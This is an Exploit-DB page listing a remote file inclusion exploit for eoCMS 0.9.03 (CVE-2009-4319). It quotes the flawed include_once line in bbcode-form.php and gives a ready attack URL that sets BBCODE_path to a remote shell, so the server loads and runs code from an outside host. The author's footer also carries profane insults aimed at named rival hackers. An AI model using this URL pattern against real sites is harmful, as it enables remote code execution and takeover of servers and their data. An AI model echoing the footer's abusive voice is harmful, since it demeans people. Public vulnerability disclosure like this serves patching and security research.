eoCMS 0.9.03 - Remote File Inclusion

EDB-ID:

10422

CVE:

2009-4319

EDB Verified:

Author:

1nd0n3s14n l4m3r

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-12-14

Vulnerable App: 
# Exploit Title: eoCMS <= 0.9.03 Remote FIle Include Vulnerability
# Date: 14-12-2009
# Author: 1nd0n3s14n l4m3r
# Software Link: http://eocms.com/index.php?act=plugin&id=4
# Version: N/A
# Tested on: GNU/LINUX
# CVE : N/A
# Code : N/A
#####################################################################


##########################################################################
##          eoCMS <= 0.9.03 Remote FIle Include Vulnerability           ##
##                  Created By 1nd0n3s14n l4m3r                         ##
##                      (c) -- 14/12/2oo9                               ##
##########################################################################

#####################################################################################
##  ~ Infected File : [bbcode-form.php]                                            ##
##                                                                                 ##
##    include_once($BBCODE_path . 'bbcodepress/bbcodepress-lite.php');             ##
##    $textarea_name = 'dataBox';                                                  ##
##    $smiley_image_path = './images/emoticons/';                                  ##
##    $bbcode_image_path = './themes/' . $settings['site_theme'] . '/images/';     ##
##                                                                                 ##
##    if(!$BBCODE_override){                                                       ##
##        $head .= '<script language=JavaScript src=bbcodepress-lite.js></script>';##
##        $BBCODE_override = getStandard('./js/bbcodepress/');                     ##
##    //        $BBCODE_override = getStandard('./js/bbcodepress/','-eocms');      ##
##     }                                                                           ##
##                                                                                 ##
##  ~ Example :                                                                    ##
##                                                                                 ##
##    [path]/js/bbcodepress/bbcode-form.php?BBCODE_path=[Shell]                    ##
##                                                                                 ##
##                                                                                 ##
#####################################################################################

##############################################################################
## ~ 9r33tZ T0 : > 4ll 1nd0n3s14n r34l h4ck3r ...                           ##
## ~ fuck      : > x-ace [ m0th3r fuck3r 1nd0n3s14n r34l sn1ch ]            ##
##               > tomahawk [b19 l4m3rs]                                    ##
##               > 1nd0n3s14n j00ml4 h4ck3r                                 ##
## ~ n0t3      : > sh0w m3 th3 c0d3 x-ace fuck3r 1f y0u r34l h4ck3r         ##
##                 y0u 4r3 n0t h4ck3r, y0u 4r3 r34l b1g l4m3rs              ##
##############################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services